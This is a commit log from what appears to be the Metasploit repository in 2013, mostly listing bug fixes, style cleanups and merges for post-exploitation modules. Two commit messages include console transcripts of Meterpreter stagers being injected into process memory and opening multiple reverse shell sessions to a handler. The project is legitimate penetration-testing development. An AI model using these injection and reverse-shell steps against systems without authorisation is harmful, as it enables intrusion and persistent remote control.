Commit Graph

1341 Commits (665f6c3e35ea431b9472db5c95300680ef539765)

Author SHA1 Message Date
Tod Beardsley 4128aa8c08
Resplat and tabs 2013-10-28 14:03:15 -05:00
sinn3r a95425de08 Check dec instead 2013-10-25 10:47:41 -05:00
sinn3r 1d0a3aad70 [FixRM #8525] undefined method `+' for nil:NilClass in enum_ie
Looks like for some reason if CryptUnprotectData fails, the decrypt_reg()
method will return "". And when you unpack "", you produce an array of nils.
Since you cannot add something to nil, this should cause an
"undefined method `+' for nil:NilClass" error.

This will check if we get an array of nils, we jump to the next iteration.
2013-10-25 00:26:38 -05:00
sinn3r e1c4aef805
Land #1789 - Windows SSO Post Module 2013-10-22 15:48:15 -05:00
Rob Fuller e447aff0ec Fix misleading statement in Outlook post module
Since this module doesn't retrieve domain exchange information as it isn't stored there it shouldn't say that Outlook isn't installed at all.
2013-10-22 11:53:15 -04:00
sinn3r 72f3d4f86c
Land #2496 - Added ability to generate multiple payloads
Thx Dave!
2013-10-22 01:42:03 -05:00
sinn3r 57e39c2b2c
Land #2498 - multiple payload capabilities 2013-10-21 14:51:24 -05:00
sinn3r 03adb48d48 Resolve NoMethodError undefined method `empty?' for nil:NilClass
blank? should fix this.
2013-10-21 14:50:25 -05:00
sinn3r 4c14595525
Land #2535 - Use %PATH% for notepad 2013-10-21 13:14:44 -05:00
sinn3r 032da9be10
Land #2426 - make use of Msf::Config.data_directory 2013-10-21 13:07:33 -05:00
Norbert Szetei 9d6031acdb Reverting payload_inject because of x64 shellcode
Injecting x64 shellcode in a SYSWOW64 process spawn a 32 bit notepad, so
we revert the changes.
2013-10-18 09:51:18 +02:00
Norbert Szetei 563bf4e639 Fix bug #8502, used %PATH% for notepad invocation
We use system %PATH% for notepad executable instead of the absolute
path, because it caused a problem with the migrate script in a 64-bit
meterpreter session. By default the wordpad binary is not in the
%PATH%, so the condition in hp_nnm_ovbuildpath_textfile.rb was not
changed.
2013-10-17 15:41:12 +02:00
Tod Beardsley f0aedd932d
More stragglers 2013-10-16 16:29:55 -05:00
Tod Beardsley f57032636e
Straggler on a weird boilerplate format 2013-10-15 14:57:04 -05:00
Tod Beardsley 5d86ab4ab8
Catch mis-formatted bracket comments. 2013-10-15 14:52:12 -05:00
Tod Beardsley ed0b84b7f7
Another round of re-splatting. 2013-10-15 14:14:15 -05:00
Tod Beardsley c83262f4bd
Resplat another common boilerplate. 2013-10-15 14:07:48 -05:00
Tod Beardsley 23d058067a
Redo the boilerplate / splat
[SeeRM #8496]
2013-10-15 13:51:57 -05:00
Tod Beardsley 63e40f9fba
Release time fixes to modules
* Period at the end of a description.
  * Methods shouldn't be meth_name! unless the method is destructive.
  * "Setup" is a noun, "set up" is a verb.
  * Use the clunky post module naming convention.
2013-10-14 15:17:39 -05:00
Meatballs 378f403fab
Land #2453, Add stdapi_net_resolve_host(s) to Python Meterpreter.
Moves resolve_host post module to multi and depreciates Windows module.
Resolve will now return nil for failed lookups instead of an empty
string.
2013-10-10 20:13:06 +01:00
Meatballs 9ca9b4ab29
Merge branch 'master' into data_dir
Conflicts:
	lib/msf/core/auxiliary/jtr.rb
2013-10-10 19:55:26 +01:00
trustedsec d208ab9260 Added multiple payload capabilities
Added support to specify multiple payload delivery options.

msf post(payload_inject) > show options

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   2                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    XXXXXXXX                         yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS  #<Msf::OptInt:0x007f5c6439c6d8>  no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION  1                                yes       The session to run this module on.

msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > exploit

[*] Running module against XXXXXXXX
[*] Starting exploit multi handler
[*] Performing Architecture Check
[*] Started reverse handler on XXXXXXXX:4433 
[*] Starting the payload handler...
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (770048 bytes) to XXXXXXXX
[+] Successfully injected payload in to process: 884
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x00ba0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 884
[*] Post module execution completed
msf post(payload_inject) > [*] Meterpreter session 2 opened (XXXXXXXX:4433 -> XXXXXXXX:2962) at 2013-10-09 21:54:25 -0400

[*] Sending stage (770048 bytes) to XXXXXXXX

msf post(payload_inject) > [*] Meterpreter session 3 opened (XXXXXXXX:4433 -> XXXXXXXX:2963) at 2013-10-09 21:54:27 -0400
2013-10-09 22:01:11 -04:00
trustedsec bec239abf1 Added ability to generate multiple payloads - not just one
Ran into a pentest recently where I had a flaky meterpreter shell, had it launch multiple ones just to be safe. The amount datastore allows you to iterate through and spawn multiple sessions.

msf exploit(psexec) > use post/windows/manage/multi_meterpreter_inject 
msf post(multi_meterpreter_inject) > show options

Module options (post/windows/manage/multi_meterpreter_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   1                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start new multi/handler job on local box.
   IPLIST   XXXXXXXXX                        yes       List of semicolom separated IP list.
   LPORT    4444                             no        Port number for the payload LPORT variable.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Payload to inject in to process memory
   PIDLIST                                   no        List of semicolom separated PID list.
   SESSION                                   yes       The session to run this module on.

msf post(multi_meterpreter_inject) > set AMOUNT 5
AMOUNT => 5
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set SESSION 1
SESSION => 1
msf post(multi_meterpreter_inject) > exploit

[*] Running module against XXXXXXXXX
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5400
[*] Injecting meterpreter into process ID 5400
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5400
[*] Meterpreter session 2 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4991) at 2013-10-09 18:04:02 -0400

[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4136
[*] Injecting meterpreter into process ID 4136
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4136
[*] Meterpreter session 3 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4992) at 2013-10-09 18:04:08 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4108
[*] Injecting meterpreter into process ID 4108
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4108
[*] Meterpreter session 4 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4993) at 2013-10-09 18:04:13 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5788
[*] Injecting meterpreter into process ID 5788
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5788
[*] Meterpreter session 5 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4994) at 2013-10-09 18:04:19 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1408
[*] Injecting meterpreter into process ID 1408
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1408
[*] Meterpreter session 6 opened (XXXXXXXXX:4444 -> XXXXXXXXX:1029) at 2013-10-09 18:04:24 -0400
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
2013-10-09 18:11:09 -04:00
Spencer McIntyre be139beb20 Remove windows from title of multi module. 2013-10-09 17:11:47 -04:00
Spencer McIntyre 6c382c8eb7 Return nil on error, and move the module to post/multi. 2013-10-09 16:52:53 -04:00
Tod Beardsley c2c6422078
Correct the name of "DynDNS" (not Dyn-DNS) 2013-10-09 09:56:07 -05:00
David Maloney 7d0cf73af7 Fix multi-meter_inject error msg
Was trying to coerce the exception class
to string rather than calling .message
Results in a stacktrace.

FIXRM #8460
2013-10-08 11:11:38 -05:00
Tod Beardsley 4266b88a20
Move author name to just 'joev'
[See #2476]
2013-10-07 12:50:04 -05:00
Meatballs c460f943f7
Merge branch 'master' into data_dir
Conflicts:
	modules/exploits/windows/local/always_install_elevated.rb
	plugins/sounds.rb
	scripts/meterpreter/powerdump.rb
	scripts/shell/spawn_meterpreter.rb
2013-10-02 20:17:11 +01:00
Tod Beardsley 4dc88cf60f Expand descriptions for ease of use. 2013-09-30 13:30:31 -05:00
Tod Beardsley 7cc2ad55a6
Land #1770, unattend.xml snarfing modules 2013-09-27 16:04:38 -05:00
Tod Beardsley d869b1bb70 Unless, unless everywhere. 2013-09-27 15:55:57 -05:00
Tod Beardsley ae655e42d2 Touchups: boolean check, unless, and TODO comment 2013-09-27 15:54:03 -05:00
Tod Beardsley 37e4d58f4a Call CSV text/plain so it can be viewed normally
Otherwise, things parsing through the loot table will treat it as binary
data, and not display it in a normal texty way, even though it's totally
readable with just a little squinting.
2013-09-27 15:48:48 -05:00
Tod Beardsley 5e77dccd48 Add a ref to an example unattend.xml 2013-09-27 15:45:57 -05:00
Meatballs 7ba846ca24 Find and replace 2013-09-26 20:34:48 +01:00
Tod Beardsley f47d4d7927 Revert change for resolve_hosts after #2415 2013-09-24 12:47:00 -05:00
Tod Beardsley c547e84fa7 Prefer Ruby style for single word collections
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.

This change converts all Payloads to this format if there is more than
one payload to choose from.

It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.

See:
  https://github.com/bbatsov/ruby-style-guide#collections
2013-09-24 12:33:31 -05:00
Tod Beardsley 8db1a389eb
Land #2304 fix post module require order
Incidentally resolve conflict on current_user_psexec to account for the
new powershell require.
2013-09-23 16:52:23 -05:00
Tod Beardsley e885ab45b6
Land #1734 Metasploit side for ip resolv 2013-09-23 16:18:40 -05:00
James Lee 9a555d8701 Fix the modules added since the branch 2013-09-17 18:25:12 -05:00
James Lee 150f0f644e Merge branch 'rapid7' into bug/osx-mods-load-order
Conflicts:
	modules/post/windows/gather/enum_dirperms.rb
2013-09-17 18:21:13 -05:00
Joe Vennix 84f015320a Probably helps to use the right alternate exploit name. 2013-09-12 16:16:49 -05:00
Joe Vennix 14577441ca Deprecates windows persistence post module. 2013-09-12 16:10:48 -05:00
James Lee 58b634dd27 Remove unnecessary requires from post mods 2013-09-12 14:36:01 -05:00
James Lee 41f23d5268 Fix merge fail
The whitespace fixes from @tabassassin somehow hosed this change.

See
845bf7146b
and
6daa90a4a5
2013-09-11 16:22:35 -05:00
jvazquez-r7 4f1db80c24 Fix requires in new post modules 2013-09-10 11:13:07 -05:00
Tod Beardsley aff35a615b Grammar fixes in descriptions 2013-09-09 15:09:53 -05:00
jvazquez-r7 ffa600ff8b Fix really the check method 2013-09-06 10:21:18 -05:00
jvazquez-r7 9b9e1592fd Retab changes 2013-09-06 10:13:38 -05:00